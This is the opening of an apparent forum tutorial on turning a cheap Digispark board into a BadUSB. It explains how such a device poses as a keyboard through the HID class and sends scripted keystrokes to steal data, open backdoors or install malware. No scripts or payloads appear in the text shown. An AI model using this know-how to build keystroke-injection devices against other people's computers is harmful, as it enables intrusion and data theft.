A Complete Beginner Friendly Guide To The Digispark BadUSB

The thesis I presented for my diploma was about physical security, with BadUSB devices taking the most amount of pages. I saw there’s already a pretty good post on how to make your own BadUSB starting from a vulnerable stick (click) but I’d like to make another contribution in the same subject by presenting a complete guide on how to use a very cheap programmable microcontroller board for the same purpose: the Digispark from Digistump.

This guide is “complete” because it will cover installation of the needed programs and drivers, include an explanation of what a BadUSB is and how it works, how to write our own scripts, and finally how to convert Rubber Ducky scripts for our little Digispark. I hope you’ll find this thread interesting and perhaps even insightful.

1. What does “BadUSB” mean?

We use the term BadUSB to describe any USB device of any type that was programmed (or reprogrammed in case of a vulnerable device being flashed) specifically to emulate a keyboard by sending a predetermined sequence of key press events to a computer in order to complete a task, which typically has the objective of gathering/stealing information, opening a backdoor on the victim machine, installing malware, or any imaginable action that can be achieved through use of the keyboard. This works thanks to the existence of a class of USB devices called HID, Human Interface Devices, a class including devices we use on a daily basis, such as gaming controllers, mouses, and of course, keyboards. A BadUSB works by identifying itself as a keyboard to the computer when connected, so the operating system will interpret the data sent by the device as key presses.